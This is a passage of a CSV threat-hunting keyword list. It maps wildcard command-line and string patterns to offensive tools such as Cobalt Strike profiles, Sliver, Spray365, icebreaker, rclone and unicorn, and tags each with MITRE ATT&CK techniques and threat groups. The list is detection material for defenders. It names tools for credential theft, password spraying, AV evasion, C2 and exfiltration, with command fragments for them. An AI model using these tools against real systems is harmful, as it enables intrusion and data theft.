+"*.py -method LDAPS -dc-ip *","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"*.py --server amsi --file *.exe*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*.py spray -ep *","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"*.py --zip -c All -d * -u * --hashes 'ffffffffffffffffffffffffffffffff':* -dc *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*.py* --payload *.ps1*","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","0","N/A","10","10","612","91","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" +"*.py* service -action create -service-name *","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"*.py* -service-name * -hashes *","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*.py*found-users.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*.rclone.exe config*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40586","3718","2023-10-04T20:39:19Z","2014-03-16T16:19:57Z" +"*.resources.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.rtf.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.rtf.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.rtf.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.rtf.htm*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.rtf.jar*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.rtf.js*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.rtf.sfx*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.rtf.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.sccmhunter*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","0","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" +"*.search.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.secure.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.sh *--checksec*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*.sh *cvelist-file:*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*.sharpgen *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","0","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*.ShellcodeRDI*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*.sites.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.SliverRPC/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*.smtp.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.ssl.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.stage.123456.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*.stage.123456.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" +"*.static.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.status.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.store.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.striker.local*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*.support.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.torproject.org/*/download/tor/*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.txt shellcode hta*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" +"*.txt shellcode macro*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" +"*.txt shellcode ms*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - 